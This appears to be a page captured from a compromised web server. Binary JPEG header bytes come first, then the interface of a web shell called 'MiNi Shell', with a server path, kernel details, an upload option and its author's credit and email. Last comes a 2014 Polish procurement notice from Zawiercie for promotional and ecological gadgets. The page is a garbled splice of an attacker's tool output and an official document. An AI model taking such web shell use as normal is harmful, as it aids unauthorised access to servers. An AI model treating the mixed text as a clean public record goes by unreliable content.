JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141125/386602-N-2014.html

<p class="kh_header"><b>Zawiercie: Dostawa gadżetów.</b><br>
<b>Numer ogłoszenia: 386602 - 2014; data zamieszczenia: 25.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa gadżetów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa gadżetów:
Część nr 1 - Dostawa gadżetów promocyjnych z nadrukiem logo miasta do wykorzystania na potrzeby promocji Gminy Zawiercie.
Szczegółowy zakres tej części obejmuje:
1) smycz reklamowa z karabińczykiem o szerokości 15 mm z kolorowym nadrukiem, 
ilość: 2 000 sztuk
2) brelok z karabinkiem i taśmą o szerokości 20 mm z kolorowym nadrukiem wraz z kółkiem na klucze, ilość: 2 000 sztuk
3) torba papierowa biała, nie mniejsza niż 24x10x32 cm (szer./gł./wys.), nadruk jeden kolor, torba bez usztywnionej krawędzi górnej i bez wzmocnionego dna, uchwyt wklejony (wewnątrz torby) Rodzaj papieru: Kraft prążkowany biały. Rodzaj uchwytu: sznurek papierowy skręcony, metoda nadruku: sitodruk, ilość: 2 000 sztuk
4) kubek reklamowy z porcelitu biały nie mniejszy niż 94mm/300ml/82mm 
z kolorowym nadrukiem metodą sublimacji, środek kubka granatowy, kubek klasy AAA, beczułkowaty wygląd, okrągłe ucho, ilość: 500 sztuk
5) koszulka typu T-shirt koloru białego z kolorowym nadrukiem wielkości A4, druk farbami wodnymi, gramatura 160 g/m2, 100% bawełna, koszulka bezszwowa, (rozmiary S 1/4 ilości, M 1/4 ilości, L 1/4 ilości, XL 1/4 ilości), koszulka jednostkowo pakowana w worek foliowy, ilość: 500 sztuk
6) koszulka typu T-shirt koloru czarnego z kolorowym nadrukiem wielkości A4, druk metodą sitodruku, gramatura 180 g/m2, 100% bawełna, koszulka bezszwowa, (rozmiary S 1/4 ilości, M 1/4 ilości, L 1/4 ilości, XL 1/4 ilości), koszulka jednostkowo pakowana w worek foliowy, ilość: 500 sztuk
7) worek odblaskowy na plecy z regulacją nie mniejszy niż 31,5 x 38,5 cm, kolor żółty, również do zamocowania na tornister, dzianina fluorescencyjna z pasem odblaskowym zgodnym z normą EN 471 lub równoważną, nadruk jeden kolor, ilość: 1 000 sztuk
8) Zegar naścienny - dwa rodzaje:
a) kolor tarczy czarny z białymi cyframi, nadruk na tarczy logo pełny kolor, średnica zegara: 250 mm, średnica tarczy: 230 mm, plastikowa obudowa w kolorze zielonym, płaska szklana szybka, aluminiowe wskazówki, mechanizm kwarcowy, mechanizm z ruchem krokowym, zasilanie - bateria 1 x R06 (wraz z załączoną baterią), opakowanie - białe pudełko z kartonu, ilość: 100 sztuk, 
b) kolor tarczy biały z czarnymi cyframi, nadruk na tarczy logo pełny kolor, średnica zegara: 250 mm, średnica tarczy: 230 mm, plastikowa obudowa w kolorze granatowym, płaska szklana szybka, aluminiowe wskazówki, mechanizm kwarcowy, mechanizm z ruchem krokowym, zasilanie - bateria 1 x R06 (wraz z załączoną baterią), opakowanie - białe pudełko z kartonu, ilość: 100 sztuk
Wykonawca zobowiązuje się na własny koszt i ryzyko dostarczyć przedmiot zamówienia na adres wskazany poniżej:
Urząd Miejski w Zawierciu, Wydziału Rozwoju i Promocji Miasta Zawiercia
ul. Piastowska 1, 42-400 Zawiercie.

Część nr 2 - Dostawa gadżetów ekologicznych z nadrukiem adresu strony internetowej (www.czystagmina.zawiercie.eu) do wykorzystania na potrzeby promocji ekologii i recyklingu w Gminie Zawiercie.

Szczegółowy zakres tej części obejmuje:
1) Długopis z niebieskim wkładem, wykonany z papieru ekologicznego,  z drewnianym klipsem oraz kolorowymi wykończeniami z biodegradowalnego plastiku, rozmiar minimum O 9 x 140 mm, nadruk 1 kolor w 1 miejscu, ilość: 400 szt.;
2) Bambusowy notes na kółkach, zapinany gumką z bambusowym długopisem, zawierający minimum 70 kartek w linie z papieru z recyklingu, rozmiar nie mniejszy niż 105 x 148 mm, w kolorze brązowym, z nadrukiem w 1 kolorze w 1 miejscu, ilość: 
100 szt.;  
3) Notes ekologiczny na kółkach wykonany z surowców wtórnych, sztywnych okładek wykonanych z makulatury i bio-plastiku, z długopisem wykonanym z papieru ekologicznego z kolorowymi wykończeniami z biodegradowalnego plastiku, wkład do długopisu koloru niebieskiego, notes powinien zawierać minimum 80 czystych kartek 
z papieru po recyklingu, rozmiar minimum 125 mm x 180 mm,  z nadrukiem w 1 kolorze w 1 miejscu, ilość: 300 szt. - notesy w 3 dowolnych kolorach (np. 100 szt. niebieski, 
50 szt. żółty itp.), dołączony długopis dobrany kolorystycznie do koloru notesu;
4) Zestaw piśmienniczy w kartonowym etui o rozmiarach minimum  45 mm x 190 mm x 20 mm, w kolorze beżowym, zawierający drewnianą linijkę 16 cm - 20 cm, 2 drewniane, grafitowe ołówki, 1 drewnianą temperówkę z metalowym ostrzem, 1 miękką, ścierającą gumkę naturalną do ołówków i grafitów do stosowania na różnych powierzchniach, 
z nadrukiem na etui kartonowym w 1 kolorze w 1 miejscu, ilość: 300 szt.;
5) Składana torba wykonana z materiału non-woven: 80 g/m2, uchwyt 38 cm, torba powinna posiadać kieszeń frontową, nadruk w 1 kolorze w 1 miejscu, rozmiar torby  
po złożeniu minimum 200 mm x 110 mm x 15mm, po rozłożeniu minimum 380 mm x 465 mm, ilość: 1000 szt. - torby w 5 dowolnych kolorach (np. 200 szt. żółty, 200 szt. zielony, itp.);
6) Drewniany piórnik w kolorze beżowym z minimum 12 kolorowymi, drewnianymi kredkami, piórnik w rozmiarze nie mniejszym niż 108 mm x 108 mm x 22 mm, nadruk 
w 1 kolorze w 1 miejscu, ilość: 300 szt.;
7) Kartonowy cylindryczny piórnik w kolorze beżowym z minimum 12 kolorowymi, drewnianymi kredkami, w rozmiarze nie mniejszym niż O 35 mm x 97 mm, nadruk 
w 1 kolorze w 1 miejscu, ilość: 300 szt.;
8) Worek odblaskowy, wodoodporny, wykonany z tkaniny fluorescencyjnej z wszytym pasem odblaskowym zgodnym z normą EN471 lub równoważną, z możliwością zamocowania na tornister, w rozmiarze minimum 350 mm x 400 mm, nadruk w 1 kolorze w 1 miejscu, ilość: 500 szt. - worki w dwóch kolorach: pomarańczowy i żółty (np. 200 szt. żółty i 300 szt. pomarańczowy);
9) Zestaw gier 7 w 1, w drewnianym pudełku z aksamitnym wnętrzem o wymiarach minimum 265 mm x 265 mm x 47 mm, zawierającym 7 gier między innymi: szachy, karty, domino, mikado, kości, dwie gry dowolnego wyboru, z nadrukiem w 1 kolorze 
w 1 miejscu, ilość: 50 szt.;
10) Gra Mikado w drewnianym pudełku o wymiarze nie mniejszym niż 193 mm x 45 mm 
x 26 mm, zestaw do gry powinien składać się z 41 jednakowych, szpiczasto zakończonych, drewnianych patyczków o długości minimum 170 mm, różniących się między sobą ilością i kolorem namalowanych na nich pasków zgodnie z ogólnymi zasadami gry, nadruk na drewnianym pudełku w 1 kolorze w 1 miejscu, ilość: 250 szt.
Wykonawca zobowiązuje się na własny koszt i ryzyko dostarczyć przedmiot zamówienia na adres wskazany poniżej:
Urząd Miejski w Zawierciu, Referat Gospodarki Komunalnej,
ul. Krzywa 3, 42-400 Zawiercie.

Opis przedmiotu zamówienia określają również wzory umów dla każdej z części - stanowiące załączniki do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 39.29.41.00-0, 79.80.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą: Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 4 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT,
2)przekształcenia podmiotowego Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zawiercie.bip.net.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych (pokój nr 202)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2014 godzina 12:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Obsługi Interesanta (Informacja), parter UM..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 15 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 25.11.2014 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com